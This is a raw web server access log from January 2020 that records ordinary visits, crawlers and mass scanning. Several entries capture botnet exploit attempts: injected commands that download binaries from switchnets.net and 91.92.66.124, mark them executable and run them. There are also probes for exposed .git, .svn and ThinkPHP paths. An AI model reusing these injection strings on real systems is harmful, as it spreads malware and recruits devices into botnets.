115.42.121.42 - - [18/Jan/2020:06:45:52 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
202.74.245.197 - - [18/Jan/2020:07:11:09 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.189.172.10 - - [18/Jan/2020:07:12:22 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
5.97.253.98 - - [18/Jan/2020:08:28:44 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
51.77.119.239 - - [18/Jan/2020:09:35:53 +0100] "GET /user/register/ HTTP/1.1" 404 162 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9) Gecko/2008052906 Firefox/3.0"
85.204.246.193 - - [18/Jan/2020:10:07:02 +0100] "GET /.git/config HTTP/1.1" 404 136 "-" "python-requests/2.22.0"
85.204.246.193 - - [18/Jan/2020:10:07:02 +0100] "GET /.svn/all-wcprops HTTP/1.1" 404 136 "-" "python-requests/2.22.0"
152.231.114.18 - - [18/Jan/2020:10:20:40 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
188.166.45.128 - - [18/Jan/2020:11:20:06 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
2.39.144.45 - - [18/Jan/2020:12:19:20 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
95.9.191.170 - - [18/Jan/2020:12:51:49 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
115.127.15.170 - - [18/Jan/2020:13:19:32 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
106.52.22.85 - - [18/Jan/2020:13:36:42 +0100] "GET /TP/public/index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET /html/public/index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET /public/index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET /elrekt.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET /TP/html/public/index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET /thinkphp/html/public/index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET /index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET /TP/index.php HTTP/1.1" 404 136 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
106.52.22.85 - - [18/Jan/2020:13:36:43 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
178.238.174.67 - - [18/Jan/2020:13:37:39 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [18/Jan/2020:13:37:39 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [18/Jan/2020:13:37:39 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [18/Jan/2020:13:37:39 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [18/Jan/2020:13:37:40 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
178.238.174.67 - - [18/Jan/2020:13:39:08 +0100] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.64.88.190 - - [18/Jan/2020:14:29:08 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
74.63.227.26 - - [18/Jan/2020:15:02:36 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
209.97.190.223 - - [18/Jan/2020:15:07:27 +0100] "GET / HTTP/1.0" 200 41 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
1.54.88.165 - - [18/Jan/2020:15:23:19 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
54.200.153.160 - - [18/Jan/2020:15:44:23 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36"
188.60.195.83 - - [18/Jan/2020:16:06:50 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
188.60.195.83 - - [18/Jan/2020:16:06:51 +0100] "GET /favicon.ico HTTP/1.1" 404 193 "http://cfpt.info/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36"
141.8.183.79 - - [18/Jan/2020:16:24:28 +0100] "GET /robots.txt HTTP/1.1" 404 162 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
141.8.183.79 - - [18/Jan/2020:16:24:32 +0100] "GET /favicon.ico HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
96.56.58.202 - - [18/Jan/2020:16:34:06 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
114.25.82.218 - - [18/Jan/2020:17:52:08 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
170.0.52.202 - - [18/Jan/2020:18:13:02 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
110.74.209.218 - - [18/Jan/2020:18:25:43 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
66.249.76.75 - - [18/Jan/2020:18:35:01 +0100] "GET /robots.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.73.45 - - [18/Jan/2020:18:35:02 +0100] "GET /ads.txt HTTP/1.1" 404 136 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.246.85.232 - - [18/Jan/2020:19:12:06 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
165.16.37.162 - - [18/Jan/2020:19:13:53 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
139.162.191.91 - - [18/Jan/2020:19:14:50 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 zgrab/0.x"
5.200.78.58 - - [18/Jan/2020:19:21:53 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
181.95.113.58 - - [18/Jan/2020:19:38:15 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
46.4.83.150 - - [18/Jan/2020:20:00:35 +0100] "GET /versionalpha/imprimante-3dvendredi-3-octobre/ HTTP/1.1" 404 564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
5.234.245.243 - - [18/Jan/2020:20:40:49 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.82.136.82 - - [18/Jan/2020:21:29:29 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.154.130.188 - - [18/Jan/2020:21:34:07 +0100] "GET /shell?cd+/tmp;rm+-rf+.j;wget+http:/\x5C/91.92.66.124/..j/.j;chmod+777+.j;sh+.j;echo+DONE HTTP/1.1" 400 568 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
177.63.241.229 - - [18/Jan/2020:22:02:03 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
185.160.95.214 - - [18/Jan/2020:22:39:22 +0100] "GET / HTTP/1.0" 200 41 "-" "-"
69.162.126.238 - - [18/Jan/2020:22:43:37 +0100] "HEAD /robots.txt HTTP/1.0" 404 0 "-" "-"
194.28.144.97 - - [18/Jan/2020:22:49:45 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
195.31.180.81 - - [18/Jan/2020:23:12:11 +0100] "GET /card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60 HTTP/1.1" 400 166 "-" "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)"
5.196.244.191 - - [18/Jan/2020:23:33:12 +0100] "GET / HTTP/1.0" 200 41 "http://cfpt.info/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
5.196.244.191 - - [18/Jan/2020:23:33:12 +0100] "GET / HTTP/1.0" 200 41 "http://cfpt.info/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.3)"
159.203.40.244 - - [19/Jan/2020:00:38:39 +0100] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
138.197.152.122 - - [19/Jan/2020:00:38:39 +0100] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
78.187.156.107 - - [19/Jan/2020:01:28:28 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
189.213.2.148 - - [19/Jan/2020:03:22:47 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
62.31.130.69 - - [19/Jan/2020:04:14:39 +0100] "GET / HTTP/1.1" 400 166 "-" "-"
92.246.85.232 - - [19/Jan/2020:04:26:54 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
82.36.159.206 - - [19/Jan/2020:04:30:19 +0100] "GET / HTTP/1.1" 200 41 "-" "-"
2.112.192.78 - - [19/Jan/2020:05:13:37 +0100] "GET / HTTP/1.1" 200 41 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
213.159.213.236 - - [19/Jan/2020:05:26:42 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"
169.197.108.6 - - [19/Jan/2020:05:51:58 +0100] "GET / HTTP/1.1" 200 65 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
